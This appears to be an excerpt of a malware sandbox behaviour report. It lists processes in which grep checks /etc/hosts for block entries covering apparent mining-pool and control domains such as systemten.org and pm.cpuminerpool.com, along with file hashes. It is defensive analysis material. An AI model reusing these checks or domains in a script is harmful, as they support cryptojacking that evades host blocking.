Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/grep Arguments: grep -q "0.0.0.0 aliyun.one" /etc/hosts File size: 211224 bytes MD5 hash: fc9b0a0ff848b35b3716768695bf2427

File Activities

File Read

Analysis Process: bash PID: 21111 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee

Analysis Process: grep PID: 21111 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/grep Arguments: grep -q "0.0.0.0 lsd.systemten.org" /etc/hosts File size: 211224 bytes MD5 hash: fc9b0a0ff848b35b3716768695bf2427

File Activities

File Read

Analysis Process: bash PID: 21112 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee

Analysis Process: grep PID: 21112 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/grep Arguments: grep -q "0.0.0.0 pastebin.com" /etc/hosts File size: 211224 bytes MD5 hash: fc9b0a0ff848b35b3716768695bf2427

File Activities

File Read

Analysis Process: bash PID: 21114 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee

Analysis Process: grep PID: 21114 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/grep Arguments: grep -q "0.0.0.0 pm.cpuminerpool.com" /etc/hosts File size: 211224 bytes MD5 hash: fc9b0a0ff848b35b3716768695bf2427

File Activities

File Read

Analysis Process: bash PID: 21117 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee

Analysis Process: grep PID: 21117 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/grep Arguments: grep -q "0.0.0.0 systemten.org" /etc/hosts File size: 211224 bytes MD5 hash: fc9b0a0ff848b35b3716768695bf2427

File Activities

File Read
